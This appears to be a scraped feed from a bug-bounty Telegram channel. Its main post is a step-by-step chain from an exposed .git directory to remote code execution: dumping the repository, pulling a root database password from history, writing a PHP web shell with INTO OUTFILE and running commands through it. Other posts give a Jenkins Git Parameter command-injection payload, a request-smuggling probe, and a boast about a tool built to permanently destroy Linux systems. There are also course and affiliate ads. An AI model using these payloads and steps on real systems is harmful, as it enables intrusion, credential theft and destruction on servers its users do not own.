Hey Hunter's,
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
๐ฅ From /.git to FULL RCE โ The Ultimate Git-Based Exploitation Chain๐ฅ
๐ฏ Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again โ weโre about to break that into Critical RCE ๐ฅ
๐ Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
โ๏ธ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
Step 2: Reconstruct the Source Code
โ This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
Look for hardcoded credentials, tokens, DB configs, etc.
๐ Realistic Example:
Weโve got database password!
Step 4: Connect to the Database
Step 5: Escalate to RCE via SQL
Check your privileges:
โ If You Have FILE Privilege:
Write a web shell to the web root:
Then browse:
Boom ๐ฅ โ Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ๐๐ผ x.com/darkshadow2bd
#bugbountytips
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
๐ฅ From /.git to FULL RCE โ The Ultimate Git-Based Exploitation Chain๐ฅ
๐ฏ Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again โ weโre about to break that into Critical RCE ๐ฅ
๐ Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
โ๏ธ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
git clone https://github.com/internetwache/GitTools๐ This tool will recursively download the entire .git repository into /webCode
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
Step 2: Reconstruct the Source Code
cd webCode
git checkout .
โ This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
git log -p
Look for hardcoded credentials, tokens, DB configs, etc.
๐ Realistic Example:
commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date: Thu Jul 11 17:32:15 2024 +0000
Added database config
diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>
Weโve got database password!
Step 4: Connect to the Database
mysql -h 258.20.78.55 -u root -p'master_!pass2020'
Step 5: Escalate to RCE via SQL
Check your privileges:
SHOW GRANTS FOR CURRENT_USER;
โ If You Have FILE Privilege:
Write a web shell to the web root:
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
Then browse:
https://target.com/shell.php?cmd=id
Boom ๐ฅ โ Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ๐๐ผ x.com/darkshadow2bd
#bugbountytips
๐ฅ20โค11๐ซก5๐1
โก COMMIX - Automated All-in-One OS Command Injection Exploitation Tool.
โ https://github.com/commixproject/commix
#bugbountytips #bugbounty
โ https://github.com/commixproject/commix
#bugbountytips #bugbounty
๐ฅ10โค6
Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! ๐ค
๐ github.com/musana/fuzzuli
๐ github.com/musana/fuzzuli
โค8๐ฅ3
Hey Hunter's,
DarkShadow here back again, just dropping a critical RCE...
๐ฅJenkins Git Parameter Plugin โ Command Injection๐
The Jenkins plugin โGit Parameterโ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
insert here $(YOUR OS COMMANDS)
So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
DarkShadow here back again, just dropping a critical RCE...
๐ฅJenkins Git Parameter Plugin โ Command Injection๐
The Jenkins plugin โGit Parameterโ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
set parameter type: branch
Input the Payload in, set default value: $(sleep 80)
insert here $(YOUR OS COMMANDS)
So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
โค16๐3๐2
Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke
๐ฅ16๐จโ๐ป1๐ฟ1
Guy's finally i made Linuxbomber.
A tool that exploit Linux environment and able to damage permanently any Linux OS even some case's it exploit hardware.
Let me know can i upload the tool in my GitHub?
Made just for educational purpose only
A tool that exploit Linux environment and able to damage permanently any Linux OS even some case's it exploit hardware.
Let me know can i upload the tool in my GitHub?
Made just for educational purpose only
๐ฅ21๐ฑ5๐4โค2๐2๐ค1
One of my student in very 1st day of the Advanced Web Pentesing session, just performed a basic automation scan and got sensitive information disclosure.
โ If you want to enroll and learn from very beginner level then DM us on https://wa.link/brutsecurity
โ If you want to enroll and learn from very beginner level then DM us on https://wa.link/brutsecurity
๐4
๐จ CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability
๐ฅPoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
๐Dorks
HUNTER : https://product.name="Jenkins"
๐ฐRefer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
๐ฅPoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
๐Dorks
HUNTER : https://product.name="Jenkins"
๐ฐRefer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
โค8
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! ๐
Check it out! ๐
๐ https://github.com/kevin-mizu/domloggerpp
Check it out! ๐
๐ https://github.com/kevin-mizu/domloggerpp
๐ฅ7๐1
This media is not supported in your browser
VIEW IN TELEGRAM
How to manually check for CL.TE Request Smuggling Vulnerabilities:
1๏ธโฃ See if a GET request accepts POST
2๏ธโฃ See if it accepts HTTP/1
3๏ธโฃ Disable "Update Content-Length"
4๏ธโฃ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked
0
G
5๏ธโฃ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
1๏ธโฃ See if a GET request accepts POST
2๏ธโฃ See if it accepts HTTP/1
3๏ธโฃ Disable "Update Content-Length"
4๏ธโฃ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked
0
G
5๏ธโฃ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
๐19โค8๐3๐ณ1
CVE-2025-7384: Critical PHP Object Injection in WordPress Plugin
A critical vulnerability has been found in the Database for Contact Form 7, WPForms, and Elementor forms WordPress plugin. Since this is a backend-only plugin, it is not directly detectable through standard search dorks. Supported frontend plugins could help determine the scope. However, only about 1% of hosts identified this way are actually vulnerable.
๐ Netlas: https://nt.ls/Be3g6
โน๏ธ Advisory: https://nt.ls/RoI8t
A critical vulnerability has been found in the Database for Contact Form 7, WPForms, and Elementor forms WordPress plugin. Since this is a backend-only plugin, it is not directly detectable through standard search dorks. Supported frontend plugins could help determine the scope. However, only about 1% of hosts identified this way are actually vulnerable.
๐ Netlas: https://nt.ls/Be3g6
โน๏ธ Advisory: https://nt.ls/RoI8t
๐5
๐ฅ Exclusive ZoomEye Offer for Brut Security Members
โ ZoomEye is giving Brut Security members 5% off any membership plan โ monthly or yearly โ through our special link.
๐ How it works:
โฆ Click our link: https://www.zoomeye.ai/pricing?aff=INVITE-2SW2-FC96
โฆ Get instant 5% discount on your purchase
๐ก Perfect for bug bounty hunters, pentesters, and researchers who rely on fast, deep internet asset scanning.
#bugbounty #pentesting #osint #cybersecurity #tools
โ ZoomEye is giving Brut Security members 5% off any membership plan โ monthly or yearly โ through our special link.
๐ How it works:
โฆ Click our link: https://www.zoomeye.ai/pricing?aff=INVITE-2SW2-FC96
โฆ Get instant 5% discount on your purchase
๐ก Perfect for bug bounty hunters, pentesters, and researchers who rely on fast, deep internet asset scanning.
#bugbounty #pentesting #osint #cybersecurity #tools
ZoomEye
Search Engine of Internet-Connected Devices. Create a Free Account to Get Started.
๐ฅ3โค1
Brut Security pinned ยซ๐ฅ Exclusive ZoomEye Offer for Brut Security Members โ
ZoomEye is giving Brut Security members 5% off any membership plan โ monthly or yearly โ through our special link. ๐ How it works: โฆ Click our link: https://www.zoomeye.ai/pricing?aff=INVITE-2SW2-FC96โฆยป